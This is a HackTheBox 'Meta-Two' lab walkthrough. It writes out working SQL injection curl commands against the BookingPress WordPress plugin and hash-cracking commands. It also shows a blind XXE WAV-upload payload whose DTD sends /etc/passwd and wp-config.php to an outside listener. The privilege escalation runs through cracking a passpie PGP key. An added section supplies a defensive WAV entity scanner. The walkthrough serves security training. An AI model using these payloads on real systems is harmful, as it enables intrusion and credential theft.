HackTheBox Meta-Two
NMAP
```
Nmap scan report for metapress.htb (10.10.11.186)
Host is up (0.13s latency).
Not shown: 947 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 c4:b4:46:17:d2:10:2d:8f:ec:1d:c9:27:fe:cd:79:ee (RSA)
|   256 2a:ea:2f:cb:23:e8:c5:29:40:9c:ab:86:6d:cd:44:11 (ECDSA)
|_  256 fd:78:c0:b0:e2:20:16:fa:05:0d:eb:d8:3f:12:a4:ab (ED25519)
80/tcp open  http    nginx 1.18.0
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-generator: WordPress 5.6.2
|_http-title: MetaPress – Official company site
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-trane-info: Problem with XML parsing of /evox/about
| http-methods:
|_  Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.18.0
```
PORT 80
Visiting the web server, it redirects to metapress.htb
![](https://i.imgur.com/If1wETt.png)
Adding the domain name to the /etc/hosts file
![](https://i.imgur.com/Y6Rc9v4.png)
![](https://i.imgur.com/D1wYbZp.png)
From Wappalyzer, it appears the site is running WordPress version 5.6.2
![](https://i.imgur.com/Fhnf0Q2.png)
So running wpscan against the URL
```
wpscan --url http://metapress.htb/
```
![](https://i.imgur.com/3JszivN.png)
![](https://i.imgur.com/CZPSyoY.png)
It only returned the version, which we already knew, and didn't find any plugins. Searching for CVEs related to WordPress shows a SQL injection via WP_Query in WordPress versions up to 5.8.2, which means this version might be vulnerable as well, but it didn't work
![](https://i.imgur.com/ZUlqEkg.png)
There was another CVE specifically for this version, but it was an authenticated XXE, so we'll probably need to log in first
![](https://i.imgur.com/SLeDDHo.png)
![](https://i.imgur.com/eGjMgAv.png)
![](https://i.imgur.com/Xm3iata.png)
And this plugin has an unauthenticated SQL injection exploit
![](https://i.imgur.com/fwVuE7B.png)
![](https://i.imgur.com/9OFJTOY.png)
```
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
--data 'action=bookingpress_front_get_category_services&_wpnonce=ef5a981727&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -'
```
![](https://i.imgur.com/jW0BhaP.png)
We can manually dump the data by first enumerating the table names
```
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
--data 'action=bookingpress_front_get_category_services&_wpnonce=0fa9f4afbd&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(table_name),@@version_comment,@@version_compile_os,1,2,3,4,5,6 from information_schema.tables where table_schema=database()-- -'
```
![](https://i.imgur.com/telx3ew.png)
Foothold
Now we need to get the column names for wp_users, because that's the table where WordPress saves user credentials, but when I tried dumping the column names, for some reason it wasn't working
```
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
--data 'action=bookingpress_front_get_category_services&_wpnonce=0fa9f4afbd&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(column_name),@@version_comment,@@version_compile_os,1,2,3,4,5,6 from information_schema.columns where table_name=wp_users-- -'
```
![](https://i.imgur.com/5ajDMyP.png)
But we don't have to worry about getting the column names: since it's WordPress, we can simply google the columns of the wp_users table
![](https://i.imgur.com/jzFE2NZ.png)
```
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
--data 'action=bookingpress_front_get_category_services&_wpnonce=0fa9f4afbd&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(user_login,user_pass),@@version_comment,@@version_compile_os,1,2,3,4,5,6 from wp_users-- -'
```
![](https://i.imgur.com/ffciQHu.png)
Cracking the hashes with hashcat, we get manager's hash cracked with the password partylikearockstar
```
hashcat -a 0 -m 400 ./hash.txt /usr/share/wordlists/rockyou.txt --force
```
![](https://i.imgur.com/Fzf4Noz.png)
![](https://i.imgur.com/zJiBNTL.png)
![](https://i.imgur.com/GC4rTuv.png)
With these credentials we can log in to the WordPress dashboard, but there's not much we can do with this user
![](https://i.imgur.com/JnJbrMJ.png)
Looking back at the authenticated XXE, we can try that
![](https://i.imgur.com/hIZ80M3.png)
We need to generate a malicious WAV file which performs an out-of-band (blind) XXE attack: it fetches a DTD from our server, and that DTD reads the /etc/passwd file and sends its contents back to us
```xml
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.14.13:2222/?p=%file;'>" >
```
```javascript
const fs = require('fs');
const wavefile = require('wavefile');

// Create a minimal WAV file with a single 32-bit channel
let wav = new wavefile.WaveFile();
wav.fromScratch(1, 44100, '32', [0, -2147483, 2147483, 4]);
// The iXML metadata chunk carries the DOCTYPE that references the DTD hosted on our server
wav.setiXML('<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM \'http://10.10.14.13:2222/uwu.dtd\'>%remote;%init;%trick;]>');
fs.writeFileSync('malicious.wav', wav.toBuffer());
```
Before running the script, make sure to install the wavefile npm package with npm i wavefile
![](https://i.imgur.com/1t6wSAR.png)
Simply upload the malicious.wav file through the Media Library option and check the listener
![](https://i.imgur.com/ivpYnAH.png)
![](https://i.imgur.com/LH3qZIx.png)
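From the defensive side, the upload step above is where this chain is easiest to catch: the WAV is structurally valid audio, but its iXML metadata chunk carries a DOCTYPE with an external entity, which no legitimate audio file needs. The following scanner is an added example and not part of this writeup or of WordPress; it walks the RIFF chunk list of an uploaded file and flags any chunk whose text declares a DTD or entity. The sample files, the chunk contents and the attacker.invalid URL are constructed here, and the set of chunk IDs is an assumption.

```javascript
// Added example (not from the original writeup): scan a WAV upload for RIFF
// chunks that carry XML entity declarations. Sample files are constructed.

// Patterns that indicate a DTD with entity declarations; a plain metadata
// payload has no reason to declare entities or reference an external DTD.
const ENTITY_PATTERNS = [/<!DOCTYPE/i, /<!ENTITY/i, /\bSYSTEM\s+["']/i, /\bPUBLIC\s+["']/i];

// Walk the RIFF chunk list and return {id, offset, size, truncated} for each
// chunk, clamping to the real buffer length so a lying size field cannot
// make us read past the end.
function listRiffChunks(buf) {
  if (buf.length < 12 || buf.toString('ascii', 0, 4) !== 'RIFF' || buf.toString('ascii', 8, 12) !== 'WAVE') {
    throw new Error('not a RIFF/WAVE file');
  }
  const chunks = [];
  let pos = 12;
  while (pos + 8 <= buf.length) {
    const id = buf.toString('ascii', pos, pos + 4);
    const size = buf.readUInt32LE(pos + 4);
    const dataStart = pos + 8;
    const dataEnd = Math.min(dataStart + size, buf.length);
    chunks.push({ id, offset: dataStart, size: dataEnd - dataStart, truncated: dataStart + size > buf.length });
    pos = dataStart + size + (size % 2); // RIFF chunks are padded to an even length
  }
  return chunks;
}

// Decode every chunk as text and report the ones matching an entity pattern.
// All chunks are checked, not only iXML, so the finding does not depend on
// which metadata chunk a particular parser happens to read.
function scanWavForXxe(buf) {
  const findings = [];
  for (const chunk of listRiffChunks(buf)) {
    const text = buf.toString('utf8', chunk.offset, chunk.offset + chunk.size);
    const matched = ENTITY_PATTERNS.filter((re) => re.test(text)).map((re) => re.source);
    if (matched.length > 0) findings.push({ chunk: chunk.id, matched });
  }
  return { suspicious: findings.length > 0, findings };
}

// --- constructed sample files -------------------------------------------
function riffChunk(id, payload) {
  const header = Buffer.alloc(8);
  header.write(id, 0, 4, 'ascii');
  header.writeUInt32LE(payload.length, 4);
  const pad = payload.length % 2 === 1 ? Buffer.alloc(1) : Buffer.alloc(0);
  return Buffer.concat([header, payload, pad]);
}

function buildWav(extraChunks) {
  const fmt = Buffer.alloc(16);       // minimal 16-bit mono PCM format chunk
  fmt.writeUInt16LE(1, 0);            // audio format: PCM
  fmt.writeUInt16LE(1, 2);            // channels
  fmt.writeUInt32LE(8000, 4);         // sample rate
  fmt.writeUInt32LE(16000, 8);        // byte rate
  fmt.writeUInt16LE(2, 12);           // block align
  fmt.writeUInt16LE(16, 14);          // bits per sample
  const body = Buffer.concat([riffChunk('fmt ', fmt), ...extraChunks, riffChunk('data', Buffer.alloc(8))]);
  const riff = Buffer.alloc(12);
  riff.write('RIFF', 0, 4, 'ascii');
  riff.writeUInt32LE(4 + body.length, 4);
  riff.write('WAVE', 8, 4, 'ascii');
  return Buffer.concat([riff, body]);
}

// Benign iXML metadata versus an iXML chunk whose DOCTYPE pulls in an
// external DTD (placeholder host, constructed for this example).
const BENIGN_WAV = buildWav([
  riffChunk('iXML', Buffer.from('<?xml version="1.0"?><BWFXML><PROJECT>podcast</PROJECT></BWFXML>')),
]);
const SUSPICIOUS_WAV = buildWav([
  riffChunk('iXML', Buffer.from('<?xml version="1.0"?><!DOCTYPE ANY [<!ENTITY % remote SYSTEM "http://attacker.invalid/x.dtd">%remote;]>')),
]);

console.log(JSON.stringify(scanWavForXxe(BENIGN_WAV)));      // suspicious: false
console.log(JSON.stringify(scanWavForXxe(SUSPICIOUS_WAV)));  // suspicious: true, chunk iXML
```

A check like this belongs in the upload path before the file reaches any metadata parser; the parser side of the fix is to process ID3/iXML text with external entity loading disabled, which is the root cause the CVE describes.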
Now reading wp-config.php, which should be one directory up
```xml
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=../wp-config.php">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.14.13:2222/?p=%file;'>" >
```
![](https://i.imgur.com/61OheCg.png)
With these credentials we can log in to FTP
![](https://i.imgur.com/T62Nwkr.png)
Going into the mailer directory, there's send_mail.php, from which we can find jnelson's password and log in through SSH
![](https://i.imgur.com/wpY1nxO.png)
Running sudo -l, we see that this user isn't allowed to run sudo
![](https://i.imgur.com/HMLuU5m.png)
Privilege Escalation
Checking the files owned by the jnelson group, we see a few files related to passpie, which is a command-line password manager
![](https://i.imgur.com/QihBmY9.png)
Here we'll see the encrypted PGP message
![](https://i.imgur.com/oFI5OYF.png)
We'll also find the PGP private key in /home/.passpie/keys
![](https://i.imgur.com/XEhEINp.png)
To decrypt the PGP message we need the passphrase of the private key so that we can import it; to recover it we can use gpg2john
```
/usr/sbin/gpg2john ./private.key > private_hash
```
![](https://i.imgur.com/l9ZGghT.png)
```
john --wordlist=/usr/share/wordlists/rockyou.txt private_hash
```
![](https://i.imgur.com/I0BVDAX.png)
With the password blink182 we can import the private key
![](https://i.imgur.com/Izu3GdE.png)
![](https://i.imgur.com/NQPscIP.png)
This might be the password for the root user, so switching to root
![](https://i.imgur.com/GLzP0yD.png)
We can also export passwords from passpie with the export option by specifying the private key password and the path where we want to save the file
![](https://i.imgur.com/AI2yc8c.png)